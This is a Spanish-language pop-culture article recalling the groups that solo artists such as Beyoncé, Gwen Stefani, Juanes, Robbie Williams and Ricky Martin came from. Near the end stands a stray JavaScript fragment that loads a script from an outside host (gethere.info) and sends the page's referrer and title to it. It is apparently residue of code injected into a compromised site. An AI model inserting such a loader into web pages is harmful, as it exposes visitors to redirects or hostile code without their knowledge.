¿Te acuerdas de estos grupos? pues de aquí salieron nuestros solistas favoritos.

Por: Rebeca Rosas

Beyoncé

Cuando hablamos de Beyoncé @Beyonce lo primero que nos imaginamos son esas perfectas asentaderas, que por cierto, sabe mover muy bien pero ¿de dónde salió la futura madre de mis hijos?

“Destinys Child” fue un grupo de R&B integrado originalmente por 4 bellas chicas, sin embargo, terminó siendo un trío que el 11 de junio de 2005 decidió separarse.

Morrissey

A muchos les sigue pesando la idea de que The Smiths @Smiths_Official jamás se volverá a reunir, pues Morrissey prefiere estar muerto antes de reunir a la banda, y es que la discusión que tuvo con Johnny Marr en el 87 fue tan fuerte que no se aguantan.

Gwen Stefani

Esta güerita de nuestro corazón debutó como cantante en el grupo “No Doubt” en 1986, pero después de tres álbumes, la estadounidense decidió alejarse de la banda.

Su primer álbum como solista lleva el nombre de “Love. Angel. Music. Baby”, inspirado en la música de los 80, lo llevo a ser uno de los discos más vendidos del año 2005.

Julieta Venegas @julietav

Fue integrante de la banda mexicana de ska/reggae Tijuana No! @TijuanaNoBand en la que compuso la canción más exitosa de la banda ‘Pobre de Ti’ junto a Álex Zúñiga. En 1996, comenzó su carrera como solista, al viajar a la Ciudad de México apoyada por la banda Café Tacuba @cafetacvba

Juanes @juanes

Juan Esteban Aristizábal Vásquez fue el vocalista de la banda de rock ‘Ekhymosis’. Su carrera como solista ha sido una de las más reconocidas a nivel mundial, teniendo gran éxito en Norte América y Europa.

 

George Michael

Este sex simbol de los años 80 y quien puso de moda la barbita de tres días, formo parte de “Wham!”. Dúo británico de pop, creado en 1981 por George Michael y Andrew Ridgeley, que 1986 decidiera separarse. El intérprete de “Careless Whisper” tuvo mucho éxito durante y después pertenecer a esta banda.

Robbie Williams  @robbiewilliams

Con “Take That” tocó el cielo, sin embargo el choque de egos entre los integrantes y su adicción a las drogas lo llevaron a dejar la banda en 1995. Al año siguiente, y luego de un tiempo en rehabilitación, lanzó su primer su primer sencillo como solista “Angels” el cual lo consolidó en los rankings.

 

Ricky Martin

Antes de cantar “La Bomba” y “La Copa de la vida” Ricky inició en el grupo Menudo, a todos los ochenteros los puso a cantar y a bailar con las coreografías de “Claridad” y “Súbete a mi moto”

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||
Comentarios